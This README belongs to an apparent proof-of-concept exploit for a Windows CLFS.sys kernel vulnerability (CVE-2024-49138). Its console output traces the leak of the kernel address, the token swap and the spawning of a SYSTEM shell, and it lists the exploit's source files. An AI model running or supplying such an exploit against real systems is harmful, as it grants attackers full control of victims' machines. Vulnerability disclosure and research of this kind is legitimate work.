POC exploit for CVE-2024-49138
# CVE-2024-49138-POC
Proof of Concept that exploits [CVE-2024-49138](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49138) in CLFS.sys.
CrowdStrike detected the vulnerability actively exploited by threat actors.
Tested on **Windows 11 23h2**.
A thorough analysis will be provided in a detailed blog post.
## Compile and Run
Compile x64 Release version.
Run and get a system shell.
PS C:\Users\IEUser\Desktop> whoami
PS C:\Users\IEUser\Desktop> .\CVE-2024-49138-POC.exe
Directory created successfully: C:\temp
Directory created successfully: C:\temp
file opened successfully
AddLogContainer successful
hResource = 0x00007FF7CDB89080
hResource = 0x00007FF7CDB890A0
pResourceData = 0x00007FF7CDB890A0
Resource size: 65536 bytes
Resource written to output.bin successfully.
Kernel Base Address: 0xFFFFF80339800000
Kernel Name: ntoskrnl.exe
NtReadVirtualMemory = 0x00007FFFAF0EFB40
NtWriteVirtualMemory = 0x00007FFFAF0EFAA0
pcclfscontainer = 0x0000000002100000
address_to_write = 0xFFFFC201424CC2B2
Process priority set to REALTIME_PRIORITY_CLASS.
Thread priority set to the highest level: TIME_CRITICAL.
triggering vuln...CreateLogFile failed with error 6601
Process priority set to NORMAL_PRIORITY_CLASS.
Thread priority set to the highest level: THREAD_PRIORITY_NORMAL.
vuln triggered
reading base of ntoskrnl to check we have arbitrary read/write
buf = 0x0000000300905A4D
swapping tokens...
current token address = 0xFFFFC201423EC578
systemtoken = 0xFFFFD401F501C6E9
Overwriting process token..
token swapped. Restoring PreviousMode and spawning system shell...
Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.
nt authority\system

[4.0K] /data/pocs/feb76cd61a7f3b3ca967fc64f0fa7ab915226750
├── [ 17K] CVE-2024-49138-POC.cpp
├── [1.4K] CVE-2024-49138-POC.rc
├── [1.4K] CVE-2024-49138-POC.sln
├── [7.1K] CVE-2024-49138-POC.vcxproj
├── [1.3K] CVE-2024-49138-POC.vcxproj.filters
├── [ 64K] mylogdddd.blf.blf
├── [2.9K] RCa04816
├── [1.8K] README.md
└── [ 460] resource.h
0 directories, 9 files
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